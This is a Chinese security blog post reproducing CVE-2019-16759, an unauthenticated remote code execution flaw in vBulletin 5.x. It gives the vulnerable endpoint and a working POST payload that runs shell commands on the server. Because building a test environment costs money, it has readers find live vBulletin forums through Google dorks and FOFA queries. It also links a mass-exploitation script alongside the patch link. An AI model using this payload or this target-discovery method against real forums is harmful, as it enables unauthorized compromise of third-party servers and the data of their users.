专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
哔哩哔哩  ·  纪录片首曝,《哪吒2》的幕后秘密 ·  17 小时前  
哔哩哔哩  ·  如何应对“致命”流感? ·  17 小时前  
哔哩哔哩  ·  全网1亿粉丝的毒舌大神,来B站了! ·  17 小时前  
安徽省发展改革委  ·  安徽省新能源汽车产业集群建设企业巡展——【2 ... ·  昨天  
安徽省发展改革委  ·  安徽省新能源汽车产业集群建设企业巡展——【2 ... ·  昨天  
51好读  ›  专栏  ›  TimelineSec

CVE-2019-16759:vBulletin 5.x未授权RCE复现

TimelineSec  · 公众号  ·  · 2019-10-01 18:17

正文

本公众号专注于漏洞复现,欢迎关注!

----------------------------------------------------------------------------------------

本文作者:CreaT0ye(Timeline Sec核心成员)

本文共562字,阅读大约需要2分钟


0x00 简介


vBulletin是一个收费低廉但强大的建站BBS(论坛)CMS,该CMS国外大量论坛使用,中国国内少许网站使用。近日,vBulletin 5.x爆出一个前台远程代码执行漏洞,无需登录即可触发。该论坛程序在国外的国外的用户量就类似dz论坛在国内的用户量。


0x01 漏洞概述


漏洞通过请求ajax/render/widget_php进行模板注入触发代码执行。


0x02 影响范围


5.0.0 <= vBulletin <=5.5.4


0x03 环境搭建


自行搭建需要付费,因此这里使用google语法和FOFA查找

google语法:

site:*.vbulletin.net

Powered by vBulletin

FOFA:

content="vBulletin"
app="vBulletin"

在线靶场获取方式

转发本文至朋友圈并截图发至公众号内即可


0x04 漏洞利用


进入如下vBulletin论坛



访问/index.php?routestring=ajax/render/widget_php会显示以下结果



然后POST如下数据即可执行命令whoami

widgetConfig[code] = echo shell_exec('whoami'); exit;



0x05 修复方式


安全更新补丁下载:

http://members.vbulletin.com/patches.php


Poc及EXP脚本:

https://github.com/Frint0/mass-pwn-vbulletin

参考链接:

https://mp.weixin.qq.com/s/hLBIbaZhwpiulL99BKRogA


福利

在各位安全圈小伙伴们的支持下

本公众号粉丝即将破1000

破1000时将发 100元红包 以感谢各位支持

欢迎各位师傅扫码加群 T复现交流群S







请到「今天看啥」查看全文